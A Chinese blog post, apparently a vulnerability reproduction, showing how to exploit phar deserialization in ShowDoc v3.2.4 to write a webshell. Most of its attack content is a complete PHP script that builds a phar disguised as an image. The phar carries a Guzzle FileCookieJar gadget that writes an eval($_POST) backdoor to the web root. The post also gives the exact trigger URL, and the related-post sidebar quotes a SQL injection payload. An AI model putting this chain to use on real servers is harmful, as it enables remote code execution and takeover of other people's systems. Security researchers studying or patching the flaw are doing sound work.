【代码审计】star7th/showdoc:v3.2.4 Phar反序列化写webshell

最新推荐文章于 2024-07-15 16:02:48 发布
最新推荐文章于 2024-07-15 16:02:48 发布
阅读量1.3k 收藏 5
点赞数 11
文章标签: 代码审计 showdoc XVE-2023-28617 漏洞复现 web thinkphp guzzlehttp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/139469822
版权

目录

漏洞速览 

复现

漏洞速览 

微步在线X情报社区-威胁情报查询_威胁分析平台_开放社区

主要就是两步,sql注入拿到用户token,再以用户身份上传恶意phar包打phar反序列化

因为文件上传对用户权限没有限制,故本文对sql注入部分不做探讨。只关注假设已经拿到用户身份(如服务开放注册接口)后如何寻找反序列化链子并利用。

复现

关注官方的commit

https://github.com/star7th/showdoc/commit/805983518081660594d752573273b8fb5cbbdb30

这里public->private的过程,再结合new_is_writebale的is_dir功能,不难想到是对phar反序列化的patch

 

showdoc是基于thinkphp3.2.3的,直接拿现成的反序列化链子打RCE不很现实

关注composer.lock(类比pom.xml)寻找可用依赖

注意到guzzlehttp/guzzle

 

可以直接打现成的链子写文件,分析文章如下

popchain与对应poc的构造分析 - FreeBuf网络安全行业门户 

<?php
namespace GuzzleHttp\Cookie {
    class CookieJar
    {
        /** @var SetCookie[] Loaded cookie data */
        private $cookies;
        public function __construct()
        {
            $this->cookies = array(new SetCookie());
        }
        /** @var bool */
        private $strictMode;
    }
    class FileCookieJar extends CookieJar
    {
        private $filename = "/var/www/html/shell.php";
        private $storeSessionCookies = true;
    }
    class SetCookie
    {
        private $data = array('Expires' => '<?php eval($_POST[\'Z3r4y\']);?>');
    }
}
namespace {
    $phar = new Phar("doc.phar");
    $phar->startBuffering();
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
    $o = new \GuzzleHttp\Cookie\FileCookieJar();
    $phar->setMetadata($o);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
}

 生成phar包后改后缀为png直接上传

 成功上传后回显文件路径

再触发phar反序列化

 

/server/index.php?s=/home/index/new_is_writeable&file=phar:///var/www/html/Public/Uploads/2024-06-04/665ede741b7e5.png

Z3r4y
关注
Docker安装ShowDoc详细教程
猿小白的博客
01-02 302
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书出美观的API文档、数据字典文档、技术文档、在线excel文档等等。如果不想编辑markdown文档,你还可以利用showdoc的自动化能力,从程序注释中自动生成API文档,或者从搭配的RunApi客户端(类似postman的api调试工具)中一边调试接口、一边自动生成文档。通过分配项目成员和团队成员,你可以很方便地进行项目文档的权限管理和团队协作,也可以分享文档出去给朋友查看。
Unable to find image 'showdoc:latest' locally
知识改变命运,ヾ(◍°∇°◍)ノ゙【求关注】
03-30 2341
Unable to find image ‘showdoc:latest’ locally 需要修改docker镜像源,里面国内的镜像
优秀运维脚本
小司机的奥拓
04-16 911
会显示出该进程名包含的所有线程。
漏洞复现 | Showdoc反序列化
最新发布
2301_80115097的博客
07-15 1549
看到了注册功能,showdoc有注册功能我们就不用尝试前台SQL注入了,直接注册就行(题目中的SQL注入多少有点滑稽..)。s=home/index/new_is_writeable&file=phar://../获取到的文件路径。区别就是登录成功后带上了Authorization,所以我们在蚁剑中添加上这样的请求头,即可成功连接。原因就是最开始的访问网页的认证登录框,我们重新开一个浏览器对比一下登录和没有登录区别。打开靶场,弹出了这种登录框,这也成为了后面的一个坑点,记住这个登录框。
php代码审计15.3phar伪协议与反序列化
划水的小白白
07-15 946
1、基础 2、生成phar格式文件 3、例子 4、小试牛刀
showdoc windows 搭建_Windows下安装Showdoc文档工具
weixin_39876282的博客
12-20 253
下载软件windows下安装推荐使用phpStudy集成环境(如果你不用集成环境,请自身确认开启了”php-pdo-sqlite”和”php-sqlite3”扩展)。phpStudy集成环境下载安装地址:https://www.xp.cn/安装后,请点击“WNMP”启动。如下图所示(以下截图基于当前版本。如果以后版本改动,可能按钮位置会有所变化,但功能应该类似):点击左侧菜单“网站”,然后点击...
showdoc接口文档-php
书山有路_邓
11-30 905
1.http://myphp.vip:4999/web/#/ 2.https://www.showdoc.cc/help?page_id=65610 ···· 原版官方镜像安装命令(中国大陆用户不建议直接使用原版镜像,可以用后面的加速镜像) docker pull star7th/showdoc 中国大陆镜像安装命令(安装后记得执行docker tag命令以进行重命名) docker pull x...
Docker部署系列:部署ShowDoc文档工具
CancerKing的博客
03-18 329
Docker部署系列:部署ShowDoc文档工具
Centos7 安装Showdoc
专注基础架构领域
06-17 2086
ShowDoc就是一个非常适合IT团队的在线文档分享工具,它可以加快团队之间沟通的效率,我们项目组也需要部署它来管理我们的文档,不过昨天遇到一个特别脑残的问题,单位装机箱把电断了,我这里的Showdoc是通过docker来做的部署,断电导致容器损坏,数据丢失,所以我今天特意做了定时数据备份,下面我们来快速搭建一下。 1、下载资源 首先打开 https://github.com/star7th/...
7th_project:网站横幅创建
04-07
由于只有一个文件名 "7th_project-main" 提供,我们可以推测这可能是一个项目主目录或者源代码文件。如果是一个目录,它可能包含了所有与项目相关的文件,如HTML文件、CSS文件、图片资源等。如果是一个文件,那它...
ShowDoc item_id 未授权SQL注入漏洞复现
0xSec
06-05 1783
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全。
showdoc】CentOS7安装showdoc
Cindy的博客
06-30 2334
1. 配置阿里云yum源 2.安装docker 卸载 [developer@node03 showdoc]$ sudo yum remove docker \ > docker-client \ > docker-client-latest \ > docker-common \ > docker-latest \ &gt..
【云原生之Docker实战】使用Docker部署ShowDoc文档工具
jks212454的博客
10-23 5520
【云原生之Docker实战】使用Docker部署ShowDoc文档工具
API文档、技术文档工具 - ShowDoc - 使用
"代码"的日常搬运
12-26 4253
主要用于使用适合IT团队的API文档、技术文档工具进行项目文档书以及进行开发。
Showdoc V3.2.5最新版远程代码执行漏洞复现
WuYSec的博客
06-05 1136
ShowDoc是一个功能强大、易于使用、免费开源的文档管理系统。通过ShowDoc,可以方便地使用Markdown语法来书出美观的API文档、数据字典文档、技术文档、在线Excel文档。攻击者通过SQL注入漏洞获取到token进入后台。进入后台后可结合反序列化漏洞WebShell,从而获取服务器权限。
docker部署showdoc详细步骤
技术萌新缓缓升级ing
02-05 2239
docker部署showdoc详细步骤
showdoc sqli to rce漏洞利用思考
C20220511的博客
07-11 1064
password 和 $refer_url 参数都可控,可通过联合查询控制password的值满足条件返回$refer_url参数值,1') union select 1,2,3,4,5,6,7,8,9,0,11,12 --,6对应的是password字段,所以password参数传递6,条件成立,回显传入$refer_url参数,那么就存在sql注入。该处调用了is_dir,并且$file可控,熟悉phar反序列化的朋友都知道,is_dir函数可协议可控的情况下可触发反序列化。这个部分存放签名内容。
ShowDoc 搭建及使用 - 一个非常适合IT团队的 API文档、技术文档工具
一个非专注于技术的程序猿
07-30 947
文档地址:https://www.showdoc.com.cn/help/13732 使用docker进行安装: #原版官方镜像安装命令(中国大陆用户不建议直接使用原版镜像,可以用后面的加速镜像) docker pull star7th/showdoc # 中国大陆镜像安装命令(安装后记得执行docker tag命令以进行重命名) docker pull registry.cn-shenzhen.aliyuncs.com/star7th/showdoc docker tag registry.cn-sh
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2704
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值